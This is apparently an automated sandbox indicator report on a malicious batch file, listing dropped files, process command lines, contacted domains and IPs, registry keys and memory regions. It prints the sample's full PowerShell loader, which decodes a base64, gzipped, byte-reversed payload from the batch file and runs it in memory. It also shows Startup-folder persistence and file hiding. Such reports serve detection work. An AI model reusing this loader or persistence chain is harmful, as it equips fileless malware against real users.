IOC Report
ilZhNx3JAc.bat

loading gif

Files

File Path
Type
Category
Malicious
ilZhNx3JAc.bat
Unicode text, UTF-8 text, with very long lines (56593), with CRLF, CR line terminators
initial sample
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MustFlush.vbs
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ar35we2c.lka.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cbgwakb1.vhj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pghh4m1g.n05.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xt5chgxg.tpq.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\MustFlush.bat
Unicode text, UTF-8 text, with very long lines (56593), with CRLF, CR line terminators
dropped
C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf
PE32 executable (console) Intel 80386, for MS Windows
dropped
C:\Users\user\AppData\Roaming\MustFlush.bat:Zone.Identifier
ASCII text, with CRLF line terminators
modified
C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf
PE32 executable (console) Intel 80386, for MS Windows
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ilZhNx3JAc.bat" "
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo F "
malicious
C:\Windows\System32\attrib.exe
attrib +s +h C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf
malicious
C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf
C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\Desktop\ilZhNx3JAc.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MustFlush.vbs"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\MustFlush.bat" "
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo F "
malicious
C:\Windows\System32\attrib.exe
attrib +s +h C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf
malicious
C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf
C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\AppData\Roaming\MustFlush.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\chcp.com
chcp 65001
C:\Windows\System32\xcopy.exe
xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\chcp.com
chcp 65001
C:\Windows\System32\xcopy.exe
xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf
There are 7 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://crt.sectigo.com/SectigoPublicServerAuthenticationRootE46.p7c0#
unknown
http://nffplp.com
unknown
http://nuget.org/NuGet.exe
unknown
https://stackoverflow.com/q/14436606/23354
unknown
https://account.dyn.com/
unknown
https://github.com/mgravell/protobuf-netJ
unknown
http://ocsp.sectigo.com0
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://github.com/mgravell/protobuf-net
unknown
http://crt.sectigo.com/cPanelECCDomainValidationSecureServerCA3.crt0#
unknown
http://www.microsoft.
unknown
http://ip-api.com/line/?fields=hosting-
unknown
https://github.com/Pester/Pester
unknown
http://crl.sectigo.com/SectigoPublicServerAuthenticationRootE46.crl0
unknown
https://github.com/mgravell/protobuf-neti
unknown
http://crl.micro
unknown
http://ip-api.com/line/?fields=hosting1
unknown
https://aka.ms/pscore6lB
unknown
https://stackoverflow.com/q/11564914/23354;
unknown
https://stackoverflow.com/q/2152978/23354
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://ip-api.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://ip-api.com/line/?fields=hosting
208.95.112.1
There are 18 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
ip-api.com
208.95.112.1
malicious
nffplp.com
163.44.198.71
malicious
s-part-0017.t-0009.t-msedge.net
13.107.246.45

IPs

IP
Domain
Country
Malicious
208.95.112.1
ip-api.com
United States
malicious
163.44.198.71
nffplp.com
Singapore
malicious

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS
FileDirectory
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2711000
trusted library allocation
page read and write
malicious
2C9E000
trusted library allocation
page read and write
malicious
8F39000
trusted library allocation
page read and write
malicious
5E54000
trusted library allocation
page read and write
malicious
65FE000
trusted library allocation
page read and write
malicious
26C1000
trusted library allocation
page read and write
malicious
4C96000
trusted library allocation
page read and write
malicious
4978000
trusted library allocation
page read and write
malicious
7A2000
remote allocation
page execute and read and write
malicious
2CC1000
trusted library allocation
page read and write
malicious
2C71000
trusted library allocation
page read and write
malicious
49CD000
trusted library allocation
page read and write
malicious
8AC0000
trusted library section
page read and write
malicious
4E44000
trusted library allocation
page read and write
malicious
5E02000
trusted library allocation
page read and write
malicious
26EE000
trusted library allocation
page read and write
malicious
8DD1000
trusted library allocation
page read and write
malicious
4FC3000
trusted library allocation
page read and write
1590000
heap
page read and write
4B9F000
trusted library allocation
page read and write
4A5C000
trusted library allocation
page read and write
25653555000
heap
page read and write
4A61000
trusted library allocation
page read and write
4EFE000
trusted library allocation
page read and write
4F0000
heap
page read and write
4C27000
trusted library allocation
page read and write
4A6D000
trusted library allocation
page read and write
4D64000
trusted library allocation
page read and write
4A97000
trusted library allocation
page read and write
41A8000
heap
page read and write
7000000
trusted library allocation
page read and write
2C9A000
trusted library allocation
page read and write
4B18000
trusted library allocation
page read and write
8810000
trusted library allocation
page execute and read and write
2CB1000
trusted library allocation
page read and write
4050000
trusted library section
page read and write
4DC3000
trusted library allocation
page read and write
4D3F000
trusted library allocation
page read and write
4D74000
trusted library allocation
page read and write
4F47000
trusted library allocation
page read and write
4F95000
trusted library allocation
page read and write
40D0000
heap
page readonly
7CA0000
trusted library allocation
page read and write
4D50000
heap
page read and write
49FD000
trusted library allocation
page read and write
16CE000
stack
page read and write
36F9000
trusted library allocation
page read and write
4F4F000
trusted library allocation
page read and write
4B74000
trusted library allocation
page read and write
69DE000
stack
page read and write
7DDC000
heap
page read and write
7050000
trusted library allocation
page read and write
647E000
stack
page read and write
26EC000
trusted library allocation
page read and write
4D19000
trusted library allocation
page read and write
2CA4000
trusted library allocation
page read and write
4B9D000
trusted library allocation
page read and write
4E55000
trusted library allocation
page read and write
4690000
heap
page execute and read and write
6FCE000
stack
page read and write
7090000
trusted library allocation
page read and write
25E80854000
heap
page read and write
22526DC5000
heap
page read and write
D23000
trusted library allocation
page execute and read and write
4ED2000
trusted library allocation
page read and write
4A1A000
trusted library allocation
page read and write
B14000
trusted library allocation
page read and write
4B3E000
trusted library allocation
page read and write
6A9E000
stack
page read and write
1378000
trusted library allocation
page read and write
229C74D0000
heap
page read and write
4B5B000
trusted library allocation
page read and write
5651000
trusted library allocation
page read and write
4AAC000
trusted library allocation
page read and write
8820000
trusted library allocation
page read and write
4B52000
trusted library allocation
page read and write
5AAE000
stack
page read and write
57FC000
trusted library allocation
page read and write
1430000
trusted library allocation
page read and write
46AA000
trusted library allocation
page read and write
700E000
stack
page read and write
7CD0000
trusted library allocation
page read and write
D70000
trusted library allocation
page read and write
6E55000
trusted library allocation
page read and write
7B30000
heap
page read and write
4C53000
trusted library allocation
page read and write
4D12000
trusted library allocation
page read and write
4DDA000
trusted library allocation
page read and write
4F27000
trusted library allocation
page read and write
6C0E000
stack
page read and write
52EE000
stack
page read and write
4BE9000
trusted library allocation
page read and write
167C000
stack
page read and write
4A40000
trusted library allocation
page read and write
4EF8000
trusted library allocation
page read and write
4D8B000
trusted library allocation
page read and write
4F6C000
trusted library allocation
page read and write
15BB000
trusted library allocation
page read and write
B45000
trusted library allocation
page execute and read and write
67EA000
stack
page read and write
16C000
stack
page read and write
4ECE000
trusted library allocation
page read and write
4CE9000
trusted library allocation
page read and write
AE1000
heap
page read and write
15CA000
trusted library allocation
page read and write
452C000
stack
page read and write
4A01000
trusted library allocation
page read and write
25E80690000
heap
page read and write
4B0B000
trusted library allocation
page read and write
4AC4000
trusted library allocation
page read and write
7110000
trusted library allocation
page read and write
4AD1000
trusted library allocation
page read and write
7DD0000
heap
page read and write
4620000
heap
page read and write
4A4B000
trusted library allocation
page read and write
4A21000
trusted library allocation
page read and write
4F12000
trusted library allocation
page read and write
4AA5000
trusted library allocation
page read and write
5514000
trusted library allocation
page read and write
40EA000
trusted library allocation
page read and write
AF0000
heap
page read and write
8010000
trusted library allocation
page read and write
4D44000
trusted library allocation
page read and write
4A9F000
trusted library allocation
page read and write
4ED0000
trusted library allocation
page read and write
C11000
heap
page read and write
4A7C000
trusted library allocation
page read and write
41A0000
heap
page read and write
D20000
trusted library allocation
page read and write
4D1B000
trusted library allocation
page read and write
4BCE000
trusted library allocation
page read and write
4B78000
trusted library allocation
page read and write
1420000
trusted library allocation
page read and write
4CBD000
trusted library allocation
page read and write
7120000
trusted library allocation
page read and write
8A0000
heap
page read and write
4AFA000
trusted library allocation
page read and write
695D000
stack
page read and write
4C89000
trusted library allocation
page read and write
24D2000
trusted library allocation
page read and write
6CD2000
heap
page read and write
4C85000
trusted library allocation
page read and write
4DC7000
trusted library allocation
page read and write
2089CBC0000
heap
page read and write
4E90000
trusted library allocation
page read and write
5060000
heap
page read and write
25653598000
heap
page read and write
8040000
heap
page execute and read and write
6EE0000
trusted library allocation
page read and write
B40000
trusted library allocation
page read and write
4DF9000
trusted library allocation
page read and write
4A4E000
trusted library allocation
page read and write
4A99000
trusted library allocation
page read and write
4B1C000
trusted library allocation
page read and write
4BED000
trusted library allocation
page read and write
4073000
trusted library allocation
page execute and read and write
4F3A000
trusted library allocation
page read and write
4A45000
trusted library allocation
page read and write
4F28000
trusted library allocation
page read and write
8B99C7C000
stack
page read and write
4C72000
trusted library allocation
page read and write
4BBF000
trusted library allocation
page read and write
229C7567000
heap
page read and write
4BB3000
trusted library allocation
page read and write
657E000
stack
page read and write
254E000
stack
page read and write
2089CE65000
heap
page read and write
643E000
stack
page read and write
4F14000
trusted library allocation
page read and write
4FA6000
trusted library allocation
page read and write
4CFF000
trusted library allocation
page read and write
4B33000
trusted library allocation
page read and write
4B8B000
trusted library allocation
page read and write
4CCB000
trusted library allocation
page read and write
4DF3000
heap
page read and write
6230000
trusted library allocation
page execute and read and write
4E59000
trusted library allocation
page read and write
4CDE000
trusted library allocation
page read and write
7B40000
trusted library allocation
page execute and read and write
5D1E000
stack
page read and write
2089CBF0000
heap
page read and write
6FEC000
trusted library allocation
page read and write
4AE2000
trusted library allocation
page read and write
7B30000
heap
page read and write
24E0000
trusted library allocation
page read and write
25E80697000
heap
page read and write
4E3E000
trusted library allocation
page read and write
AC7000
heap
page read and write
4F11000
trusted library allocation
page read and write
4651000
trusted library allocation
page read and write
4EE7000
trusted library allocation
page read and write
4D20000
heap
page execute and read and write
60C0000
heap
page read and write
5D10000
heap
page read and write
4D7C000
trusted library allocation
page read and write
4E51000
trusted library allocation
page read and write
5F0000
heap
page read and write
4B46000
trusted library allocation
page read and write
68DD000
stack
page read and write
70E0000
trusted library allocation
page read and write
B5A000
heap
page read and write
4EB7000
trusted library allocation
page read and write
4B3C000
trusted library allocation
page read and write
4F78000
trusted library allocation
page read and write
4B14000
trusted library allocation
page read and write
B3A000
trusted library allocation
page execute and read and write
6FB0000
trusted library allocation
page execute and read and write
63DF000
trusted library allocation
page read and write
6E80000
trusted library allocation
page read and write
8070000
trusted library allocation
page read and write
617000
heap
page read and write
4D2C000
trusted library allocation
page read and write
4E60000
trusted library allocation
page read and write
4F54000
trusted library allocation
page read and write
4BC1000
trusted library allocation
page read and write
6DDE000
heap
page read and write
4F3E000
trusted library allocation
page read and write
7D9A000
heap
page read and write
6F30000
trusted library allocation
page read and write
2089CC02000
heap
page read and write
C03000
trusted library allocation
page execute and read and write
4E70000
trusted library allocation
page read and write
D42000
trusted library allocation
page read and write
82D0000
trusted library allocation
page read and write
D40000
trusted library allocation
page read and write
7030000
trusted library allocation
page read and write
4D27000
trusted library allocation
page read and write
4A33000
trusted library allocation
page read and write
25653540000
heap
page read and write
8B99D7E000
stack
page read and write
4B4E000
trusted library allocation
page read and write
270D000
trusted library allocation
page read and write
4CC6000
trusted library allocation
page read and write
AF2000
heap
page read and write
47F8000
trusted library allocation
page read and write
668E000
stack
page read and write
4CE1000
trusted library allocation
page read and write
4D17000
trusted library allocation
page read and write
7FFB1E866000
unkown
page readonly
6A20000
heap
page read and write
182E000
stack
page read and write
449C000
stack
page read and write
ADB47FD000
stack
page read and write
7FFB1E872000
unkown
page readonly
4F54000
trusted library allocation
page read and write
8BE0000
trusted library section
page read and write
4DF7000
trusted library allocation
page read and write
7DE4000
heap
page read and write
7DE000
remote allocation
page execute and read and write
64E5000
trusted library allocation
page read and write
4C87000
trusted library allocation
page read and write
2CCC000
trusted library allocation
page read and write
45CE000
stack
page read and write
52E000
stack
page read and write
6D6C000
heap
page read and write
40A2000
trusted library allocation
page read and write
66BE000
stack
page read and write
4A2B000
trusted library allocation
page read and write
4BB4000
trusted library allocation
page read and write
4F64000
trusted library allocation
page read and write
D3D000
trusted library allocation
page execute and read and write
5709000
trusted library allocation
page read and write
584E000
trusted library allocation
page read and write
4F8B000
trusted library allocation
page read and write
36B9000
trusted library allocation
page read and write
8000000
trusted library section
page read and write
6FF0000
trusted library allocation
page read and write
4B09000
trusted library allocation
page read and write
4F7A000
trusted library allocation
page read and write
4AEE000
trusted library allocation
page read and write
4B5D000
trusted library allocation
page read and write
4A7A000
trusted library allocation
page read and write
50CC000
stack
page read and write
4B2D000
trusted library allocation
page read and write
B50000
heap
page read and write
25E80570000
heap
page read and write
BE0000
heap
page read and write
4089000
trusted library allocation
page read and write
4B0E000
trusted library allocation
page read and write
4DBD000
trusted library allocation
page read and write
22526C30000
heap
page read and write
4B4A000
trusted library allocation
page read and write
4D19000
trusted library allocation
page read and write
4CDA000
trusted library allocation
page read and write
4EB3000
trusted library allocation
page read and write
8170000
trusted library allocation
page execute and read and write
4F8F000
trusted library allocation
page read and write
2089CC54000
heap
page read and write
15F6000
trusted library allocation
page read and write
4C70000
trusted library allocation
page read and write
5EA0000
trusted library allocation
page read and write
768000
stack
page read and write
4AB0000
trusted library allocation
page read and write
7C0F000
stack
page read and write
4BBB000
trusted library allocation
page read and write
4A89000
trusted library allocation
page read and write
4A04000
trusted library allocation
page read and write
8A90000
trusted library allocation
page execute and read and write
8130000
heap
page read and write
C04000
trusted library allocation
page read and write
2089CE60000
heap
page read and write
682E000
stack
page read and write
4BAA000
trusted library allocation
page read and write
4BDC000
trusted library allocation
page read and write
1630000
heap
page read and write
6477000
trusted library allocation
page read and write
4ADA000
trusted library allocation
page read and write
4CB0000
trusted library allocation
page read and write
4BF1000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
E91987C000
stack
page read and write
8910000
trusted library allocation
page execute and read and write
4AB8000
trusted library allocation
page read and write
B10000
trusted library allocation
page read and write
B1D000
trusted library allocation
page execute and read and write
4EB1000
trusted library allocation
page read and write
4D32000
trusted library allocation
page read and write
4D0C000
trusted library allocation
page read and write
D2E000
stack
page read and write
4BC1000
trusted library allocation
page read and write
4E57000
trusted library allocation
page read and write
A42000
unkown
page readonly
4B46000
trusted library allocation
page read and write
6D7B000
heap
page read and write
4B3A000
trusted library allocation
page read and write
4B12000
trusted library allocation
page read and write
5E93000
trusted library allocation
page read and write
4A1E000
trusted library allocation
page read and write
4EB9000
trusted library allocation
page read and write
4D4D000
trusted library allocation
page read and write
4B63000
trusted library allocation
page read and write
4EE9000
trusted library allocation
page read and write
4CB3000
trusted library allocation
page read and write
82C0000
trusted library allocation
page read and write
5E0000
heap
page read and write
6450000
heap
page read and write
6FBAF000
unkown
page readonly
7E8000
stack
page read and write
C18000
trusted library allocation
page read and write
7D80000
heap
page read and write
4BFB000
trusted library allocation
page read and write
AEF000
heap
page read and write
627E000
stack
page read and write
ADB49FF000
stack
page read and write
6FB91000
unkown
page execute read
4A80000
trusted library allocation
page read and write
4CBB000
trusted library allocation
page read and write
8822000
trusted library allocation
page read and write
22526DC0000
heap
page read and write
4DFB000
trusted library allocation
page read and write
4A76000
trusted library allocation
page read and write
4CF8000
trusted library allocation
page read and write
6EC3000
heap
page read and write
4B1D000
trusted library allocation
page read and write
7020000
trusted library allocation
page read and write
4B07000
trusted library allocation
page read and write
56C9000
trusted library allocation
page read and write
15D6000
trusted library allocation
page read and write
7C80000
trusted library allocation
page read and write
6BDE000
stack
page read and write
4D39000
trusted library allocation
page read and write
7B9000
heap
page read and write
ADB45FF000
stack
page read and write
6DD3000
heap
page read and write
679B000
stack
page read and write
6DB000
heap
page read and write
5F00000
trusted library allocation
page read and write
4AAD000
trusted library allocation
page read and write
4F76000
trusted library allocation
page read and write
2089CBA0000
heap
page read and write
4C6E000
trusted library allocation
page read and write
4D66000
trusted library allocation
page read and write
47A2000
trusted library allocation
page read and write
4A3A000
trusted library allocation
page read and write
4C96000
trusted library allocation
page read and write
4BA8000
trusted library allocation
page read and write
4A60000
trusted library allocation
page read and write
8B80000
trusted library allocation
page read and write
4DB9000
trusted library allocation
page read and write
4C19000
trusted library allocation
page read and write
ADB40FA000
stack
page read and write
5EB0000
trusted library allocation
page execute and read and write
4F23000
trusted library allocation
page read and write
4C64000
trusted library allocation
page read and write
4BB0000
trusted library allocation
page read and write
8250000
trusted library allocation
page execute and read and write
4F66000
trusted library allocation
page read and write
4EA4000
trusted library allocation
page read and write
25E806A2000
heap
page read and write
AC0000
heap
page read and write
4D07000
trusted library allocation
page read and write
5BD0000
heap
page read and write
4FC1000
trusted library allocation
page read and write
4D23000
trusted library allocation
page read and write
4EA0000
trusted library allocation
page read and write
6EA000
stack
page read and write
4DC9000
trusted library allocation
page read and write
4B31000
trusted library allocation
page read and write
4A7E000
trusted library allocation
page read and write
4ABB000
trusted library allocation
page read and write
8082000
trusted library allocation
page read and write
70F000
heap
page read and write
4DEB000
trusted library allocation
page read and write
DCE000
stack
page read and write
691B000
stack
page read and write
24EB000
trusted library allocation
page execute and read and write
B00000
trusted library allocation
page read and write
6930000
heap
page read and write
2550000
heap
page execute and read and write
4B6D000
trusted library allocation
page read and write
4AC2000
trusted library allocation
page read and write
6620000
heap
page read and write
4D04000
trusted library allocation
page read and write
54FD000
stack
page read and write
B223A79000
stack
page read and write
4DCD000
trusted library allocation
page read and write
7BCE000
stack
page read and write
D5B000
trusted library allocation
page execute and read and write
4BF5000
trusted library allocation
page read and write
830000
heap
page read and write
4F10000
trusted library allocation
page read and write
68FE000
stack
page read and write
4B4B000
trusted library allocation
page read and write
4AA8000
trusted library allocation
page read and write
6B4E000
stack
page read and write
5659000
trusted library allocation
page read and write
4CC1000
trusted library allocation
page read and write
4F4B000
trusted library allocation
page read and write
4096000
trusted library allocation
page execute and read and write
4D30000
trusted library allocation
page read and write
4ED4000
trusted library allocation
page read and write
4A95000
trusted library allocation
page read and write
8120000
trusted library allocation
page read and write
4B95000
trusted library allocation
page read and write
4B1E000
trusted library allocation
page read and write
691B000
stack
page read and write
CA8000
unkown
page execute read
7EE0000
trusted library allocation
page read and write
4B55000
trusted library allocation
page read and write
4A8A000
trusted library allocation
page read and write
476C000
stack
page read and write
4D9E000
trusted library allocation
page read and write
A42000
unkown
page readonly
468E000
stack
page read and write
5E5E000
stack
page read and write
22526B1A000
heap
page read and write
4F62000
trusted library allocation
page read and write
4E8B000
trusted library allocation
page read and write
4AC0000
trusted library allocation
page read and write
82E0000
trusted library allocation
page read and write
7FFB1E870000
unkown
page read and write
AF7000
heap
page read and write
4C5B000
trusted library allocation
page read and write
5D02000
heap
page read and write
4FA8000
trusted library allocation
page read and write
4AA1000
trusted library allocation
page read and write
4ECA000
trusted library allocation
page read and write
7DB6000
heap
page read and write
4AE8000
trusted library allocation
page read and write
663E000
stack
page read and write
4C43000
trusted library allocation
page read and write
8AB0000
trusted library allocation
page execute and read and write
15C5000
trusted library allocation
page read and write
6FBAD000
unkown
page read and write
D4A000
trusted library allocation
page execute and read and write
5507000
trusted library allocation
page read and write
4632000
trusted library allocation
page read and write
7060000
trusted library allocation
page read and write
5D00000
heap
page read and write
B30000
trusted library allocation
page read and write
4AA3000
trusted library allocation
page read and write
4CC3000
trusted library allocation
page read and write
681E000
stack
page read and write
7FFB1E850000
unkown
page readonly
4E94000
trusted library allocation
page read and write
4B9A000
trusted library allocation
page read and write
69F0000
trusted library allocation
page read and write
66A000
stack
page read and write
2719000
trusted library allocation
page read and write
802D000
trusted library allocation
page read and write
6FE0000
trusted library allocation
page read and write
4CEC000
trusted library allocation
page read and write
4A1C000
trusted library allocation
page read and write
4F70000
trusted library allocation
page read and write
4D2E000
trusted library allocation
page read and write
4BF7000
trusted library allocation
page read and write
4060000
trusted library allocation
page read and write
7A0000
remote allocation
page execute and read and write
49F3000
trusted library allocation
page read and write
4DB7000
trusted library allocation
page read and write
4D68000
trusted library allocation
page read and write
4A0E000
trusted library allocation
page read and write
45C0000
heap
page execute and read and write
7A0000
heap
page read and write
B8F000
heap
page read and write
B36000
trusted library allocation
page execute and read and write
4A9B000
trusted library allocation
page read and write
7080000
trusted library allocation
page read and write
5D04000
heap
page read and write
4B69000
trusted library allocation
page read and write
BDE000
stack
page read and write
C0D000
trusted library allocation
page execute and read and write
4E1B000
trusted library allocation
page read and write
4F51000
trusted library allocation
page read and write
4CD5000
trusted library allocation
page read and write
6F07000
trusted library allocation
page read and write
8000000
trusted library allocation
page read and write
4F7E000
trusted library allocation
page read and write
4F13000
trusted library allocation
page read and write
8020000
trusted library allocation
page read and write
4AA9000
trusted library allocation
page read and write
65F000
heap
page read and write
4ADE000
trusted library allocation
page read and write
7040000
trusted library allocation
page read and write
4F4E000
trusted library allocation
page read and write
636B000
trusted library allocation
page read and write
4F6A000
trusted library allocation
page read and write
1633000
heap
page read and write
B223B7F000
stack
page read and write
4D10000
trusted library allocation
page read and write
4A0C000
trusted library allocation
page read and write
B13000
trusted library allocation
page execute and read and write
7FFB1E851000
unkown
page execute read
4F58000
trusted library allocation
page read and write
4D72000
trusted library allocation
page read and write
4CCE000
trusted library allocation
page read and write
4D4D000
trusted library allocation
page read and write
C27000
heap
page read and write
4E01000
trusted library allocation
page read and write
2570000
trusted library allocation
page read and write
4A18000
trusted library allocation
page read and write
4A5E000
trusted library allocation
page read and write
4C12000
trusted library allocation
page read and write
ADB48FE000
stack
page read and write
2C41000
trusted library allocation
page read and write
689A000
stack
page read and write
AEF000
stack
page read and write
4ABD000
trusted library allocation
page read and write
4BF4000
heap
page read and write
EDE000
stack
page read and write
4C78000
trusted library allocation
page read and write
88F2319000
stack
page read and write
7010000
trusted library allocation
page read and write
49F7000
trusted library allocation
page read and write
4B97000
trusted library allocation
page read and write
D2D000
trusted library allocation
page execute and read and write
7C30000
heap
page read and write
4B4C000
trusted library allocation
page read and write
6FC0000
trusted library allocation
page read and write
62FE000
stack
page read and write
6FBAD000
unkown
page read and write
4B72000
trusted library allocation
page read and write
850000
heap
page read and write
4D4B000
trusted library allocation
page read and write
7CDA000
trusted library allocation
page read and write
719C000
stack
page read and write
4E47000
trusted library allocation
page read and write
62B0000
trusted library allocation
page execute and read and write
15DD000
trusted library allocation
page read and write
8B99CFF000
stack
page read and write
644C000
trusted library allocation
page read and write
459E000
stack
page read and write
56B7000
trusted library allocation
page read and write
4E16000
trusted library allocation
page read and write
D52000
trusted library allocation
page read and write
512E000
stack
page read and write
4AAB000
trusted library allocation
page read and write
5E77000
trusted library allocation
page read and write
4B10000
trusted library allocation
page read and write
4F6E000
trusted library allocation
page read and write
4EFA000
trusted library allocation
page read and write
4B42000
trusted library allocation
page read and write
4C55000
trusted library allocation
page read and write
4EA8000
trusted library allocation
page read and write
4B65000
trusted library allocation
page read and write
8092000
trusted library allocation
page read and write
4B55000
trusted library allocation
page read and write
1A8000
stack
page read and write
708D000
stack
page read and write
4F56000
trusted library allocation
page read and write
4C1F000
trusted library allocation
page read and write
486E000
stack
page read and write
4070000
trusted library allocation
page read and write
15B6000
trusted library allocation
page read and write
4B63000
trusted library allocation
page read and write
4A10000
trusted library allocation
page read and write
4A29000
trusted library allocation
page read and write
68DD000
stack
page read and write
4A6B000
trusted library allocation
page read and write
4E5B000
trusted library allocation
page read and write
4B9B000
trusted library allocation
page read and write
4F02000
trusted library allocation
page read and write
6D1000
heap
page read and write
6280000
trusted library allocation
page read and write
4BC5000
trusted library allocation
page read and write
6FBAD000
unkown
page read and write
4BAE000
trusted library allocation
page read and write
62BE000
stack
page read and write
4BE7000
trusted library allocation
page read and write
6ECE000
stack
page read and write
D57000
trusted library allocation
page execute and read and write
552D000
trusted library allocation
page read and write
4E83000
trusted library allocation
page read and write
4D2F000
trusted library allocation
page read and write
2580000
heap
page read and write
4C40000
trusted library allocation
page read and write
88F239E000
stack
page read and write
4A75000
trusted library allocation
page read and write
60D0000
trusted library allocation
page read and write
26EA000
trusted library allocation
page read and write
4D08000
trusted library allocation
